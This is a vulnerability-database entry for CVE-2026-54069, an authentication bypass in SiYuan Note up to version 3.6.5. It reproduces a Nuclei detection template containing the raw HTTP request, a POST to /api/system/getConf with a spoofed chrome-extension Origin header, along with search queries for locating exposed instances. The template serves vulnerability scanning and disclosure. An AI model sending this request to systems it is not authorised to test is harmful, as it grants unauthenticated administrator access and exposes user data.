| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2026-54069 | 24 Jun 202621:17 | – | attackerkb | |
| CVE-2026-54069 | 17 Jun 202604:18 | – | circl | |
| CVE-2026-54069 | 24 Jun 202621:17 | – | cve | |
| CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist | 24 Jun 202621:17 | – | cvelist | |
| EUVD-2026-39125 | 24 Jun 202621:17 | – | euvd | |
| CVE-2026-54069 | 24 Jun 202622:16 | – | nvd | |
| PT-2026-50413 | 17 Jun 202600:00 | – | ptsecurity | |
| CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist | 24 Jun 202621:17 | – | vulnrichment |
id: CVE-2026-54069
info:
name: SiYuan Note <= 3.6.5 - Authentication Bypass
author: 0x_Akoko
severity: high
description: |
SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
impact: |
Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.
remediation: |
Update to SiYuan Note v3.7.0 or later.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3
- https://nvd.nist.gov/vuln/detail/CVE-2026-54069
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-54069
epss-score: 0.00607
epss-percentile: 0.44641
cwe-id: CWE-346
metadata:
verified: false
max-request: 1
vendor: siyuan-note
product: siyuan
shodan-query: title:"SiYuan"
fofa-query: title="SiYuan" || body="siyuan"
tags: cve,cve2026,siyuan,auth-bypass,unauth
http:
- raw:
- |
POST /api/system/getConf HTTP/1.1
Host: {{Hostname}}
Origin: chrome-extension://auth-test
Content-Type: application/json
{}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "\"code\":0")'
- 'contains_all(body, "\"conf\"", "\"system\"", "\"kernelVersion\"")'
condition: and
# digest: 4a0a0047304502201ac92fa95ce0feaf25c24ab13bb431f54d78aa395e793e38998e1d0d1b94f245022100887d09d50ec075f07f12cf729123057033dca6c436adeedf2867696dee0ed452:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation